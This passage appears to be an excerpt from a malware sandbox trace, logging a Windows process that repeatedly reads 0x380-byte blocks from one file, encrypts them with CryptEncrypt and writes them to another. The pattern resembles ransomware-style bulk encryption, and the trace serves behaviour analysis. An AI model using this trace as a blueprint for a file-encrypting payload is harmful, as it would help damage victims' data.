nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.509] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.509] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.509] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.509] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.509] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.509] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.509] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.509] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.509] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.509] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.509] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.509] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.509] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.509] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.509] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.510] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.510] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.510] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.510] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.510] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.510] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.510] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.510] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.510] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.510] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.510] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.510] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.510] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.510] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.510] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.510] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.511] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.511] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.511] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.511] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.511] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.511] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.511] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.511] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.511] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.511] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.511] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.511] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.511] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.511] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.511] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.511] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.512] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.512] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.512] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.512] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.512] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.512] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.512] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.512] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.512] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.512] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.512] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.512] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.512] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.512] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.512] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.513] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.513] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.513] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.513] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.513] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.513] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.513] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.513] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.513] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.513] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.513] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.513] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.513] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.513] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.513] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.514] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.514] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.514] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.514] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.514] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.514] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.514] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.514] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.514] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.514] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.514] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.514] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.514] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.514] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.514] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.514] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.514] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.515] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.515] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.515] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.515] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, 